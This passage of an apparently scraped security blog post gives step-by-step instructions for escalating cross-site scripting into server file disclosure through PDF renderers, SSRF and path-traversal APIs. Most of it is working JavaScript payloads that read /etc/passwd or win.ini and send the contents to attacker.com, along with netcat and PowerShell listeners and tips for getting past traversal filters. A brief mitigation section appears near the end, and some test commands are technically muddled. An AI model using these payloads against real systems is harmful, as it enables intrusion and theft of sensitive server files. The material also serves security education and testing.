XSS to Internal File Disclosure: From Alert Box to Full Server Filesystem Access + Video

Listen to this Post

. If the generated PDF executes JavaScript when opened, it’s vulnerable.

  • Craft a File Disclosure Payload: Replace the test payload with a script designed to fetch a sensitive local file. The payload will attempt to use an `iframe` or `embed` tag to load a `file://` URI. For example, to read the `/etc/passwd` file on a Linux server, use:
  • 
    <script>
    var iframe = document.createElement('iframe');
    iframe.src = 'file:///etc/passwd';
    iframe.onload = function() {
    // Attempt to exfiltrate the iframe's content
    var fileContent = iframe.contentWindow.document.body.innerText;
    fetch('https://attacker.com/exfil', { method: 'POST', body: fileContent });
    };
    document.body.appendChild(iframe);
    </script>
    
    

    Important: The `file://` protocol is often restricted by browser security policies. This attack is more likely to succeed when the PDF is rendered server-side (e.g., by a headless browser like PhantomJS or an internal document processing service) that has looser restrictions, or by using alternative protocols like `http://localhost/internal-api`.

    2. Escalating XSS to Arbitrary File Read via Server-Side Request Forgery (SSRF)

    Modern PDF generation libraries may not prevent the use of the `http://` or `https://` protocols. This allows an attacker to pivot from a client-side XSS to a server-side SSRF attack, which can then be used to read local files or interact with internal services.

    Step-by-Step Guide for Windows/Linux:

    This guide demonstrates a multi-step attack chain: XSS -> SSRF -> LFI.

    1. The XSS Entry Point: Assume you have found a stored XSS vulnerability in a comment field. Your injected payload will be executed whenever an administrator or a server-side process views the page.
    2. The Internal File Reader Payload: Your payload will make the server’s internal PDF generator (or any server-side HTTP client) fetch a URL you control.
    
    <script>
    // This script will be executed in the context of a server-side PDF generator.
    // It instructs the PDF generator to fetch a local file using an HTTP URL.
    const internalFetch = 'http://localhost:8080/internal/api?url=file:///c:/windows/win.ini';
    fetch(internalFetch)
    .then(response => response.text())
    .then(data => {
    // Exfiltrate the content of the file
    fetch('https://attacker.com/log', { method: 'POST', body: data });
    });
    </script>
    
    
    1. Setting Up the Listener (Attacker Machine): On your server, set up a simple listener (using netcat) to capture the exfiltrated data.

    Linux:

    nc -lvnp 443
    

    Windows (using PowerShell):

    $listener = New-Object System.Net.Sockets.TcpListener(443);
    $listener.Start();
    $client = $listener.AcceptTcpClient();
    $stream = $client.GetStream();
    $reader = New-Object System.IO.StreamReader($stream);
    $data = $reader.ReadToEnd();
    Write-Host $data;
    
    1. Execution: Once your payload is stored, wait for the server-side process to trigger it. When it does, you will receive the contents of `win.ini` (or any other readable file) on your listening server.

    2. Chaining XSS with Local File Inclusion (LFI) via API Manipulation

    Some modern applications have APIs that accept filenames or paths. An XSS can be used to call these APIs, effectively turning a client-side script into an LFI exploit when an authenticated session is available.

    Step-by-Step Guide for API Exploitation:

    1. Identify an API Endpoint: Use browser developer tools (F12 -> Network tab) to observe all API calls made by the application. Look for endpoints with parameters that resemble filenames or paths, such as: `/api/getFile?name=report.pdf` or /api/export?template=invoice.tpl.
    2. Craft the XSS Payload: Create a JavaScript payload that will make an authenticated `fetch` request to the vulnerable API endpoint, reading a sensitive system file like ../../../../etc/passwd.
    
    <script>
    fetch('/api/getFile?name=../../../../etc/passwd')
    .then(response => response.text())
    .then(data => {
    // Create an image object to exfiltrate data as a GET request
    const img = new Image();
    img.src = 'https://attacker.com/steal?data=' + encodeURIComponent(data);
    });
    </script>
    
    
    1. Test the LFI Component Directly (Optional): Before deploying the XSS, test the API endpoint directly in your browser while authenticated. Change the `name` parameter to ../../../../etc/passwd. If the server returns the file’s content, the API is vulnerable to LFI. If it blocks or sanitizes ../, try URL encoding (%2e%2e%2f) or double URL encoding.
    2. Deploy and Exfiltrate: Inject your final XSS payload into a vulnerable input field. When the page is viewed by an authenticated user (like an admin), the script will execute, fetch the `passwd` file via the vulnerable API, and send it to your attacker-controlled server.

    4. Mitigation and Prevention Strategies

    Understanding the impact of this vulnerability chain is the first step; building secure applications is the next. Here are the critical controls to prevent XSS from escalating to file disclosure.

    For Developers:

    • Sanitize All Output: Never trust user input. Use a context-aware sanitization library to encode or escape all data before inserting it into an HTML page, PDF generator, or API call. For PDFs, consider rendering them in a sandboxed environment with no access to the local filesystem.
    • Harden API Endpoints: Implement strict allowlists for file paths and names. Never allow user-supplied input to directly construct a file path. Use a secure, server-side mapping system (e.g., a unique ID maps to a pre-approved file).
    • Implement CSP: A strong Content Security Policy (CSP) can prevent the execution of inline scripts and restrict the destinations to which data can be sent, significantly reducing the impact of XSS.

    For Penetration Testers:

    • Always Escalate: When you find an XSS, don’t stop at the alert box. Probe for its impact by attempting to interact with internal services or read local files.
    • Test for SSRF and LFI: Combine XSS tests with SSRF and LFI payloads. A tool like Burp Suite can automate this by inserting payloads into all parameters.
    • Use Automated Scanners: Employ tools to test for known vulnerabilities in libraries that might lead to file disclosure. For example, a vulnerable PDF generator library could be your entry point.

    Linux and Windows Commands for Simulating and Testing These Attacks:

    On your own system, you can simulate the attack environment to practice.

    Linux:

     Serve a test PDF file that contains your XSS payload
    echo '<script>document.write("<iframe src=file:///etc/passwd></iframe>")</script>' > test.pdf
     Start a simple HTTP server to host the file
    python3 -m http.server 8000
     Use curl to simulate a server-side PDF generator fetching the file
    curl "http://localhost:8000/test.pdf" --output simulated_fetch.pdf
    

    Windows:

     Create a test HTML file with a more advanced file read payload
    @"
    
    <script>
    fetch('http://localhost/internal/api?file=C:\Windows\win.ini')
    .then(r=>r.text())
    .then(d=>fetch('https://attacker.com/log',{method:'POST',body:d}));
    </script>
    
    "@ | Out-File -FilePath test.html
    

    What Undercode Say:

    • XSS is a gateway, not a destination. Treat every XSS vulnerability as a potential entry point for more severe attacks like server-side file reads and internal network pivoting.
    • Defense in depth is mandatory. Relying on a single control, like output encoding, is insufficient. Combining CSP, API hardening, input validation, and sandboxing provides a robust defense.
    • Automation accelerates, but creativity escalates. While scanners find simple XSS, manual chaining—combining bugs like XSS with LFI or SSRF—is what discovers critical, high-impact vulnerabilities.

    Prediction:

    As web applications increasingly rely on headless browsers and server-side rendering for generating rich content (like PDFs, images, and screenshots), the risk of XSS-to-file-disclosure chains will grow. Attackers will shift focus from client-side cookie theft to exploiting these server-side contexts to directly access source code, configuration files, and internal APIs. This evolution will force a re-evaluation of XSS severity classifications, with many instances being upgraded from medium to critical risk, especially in cloud-native and document-processing environments.

    ▶️ Related Video (82% Match):

    🎯Let’s Practice For Free:

    IT/Security Reporter URL:

    Reported By: Faiyaz Ahmad – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

    💬 Whatsapp | 💬 Telegram

    📢 Follow UndercodeTesting & Stay Tuned:

    𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky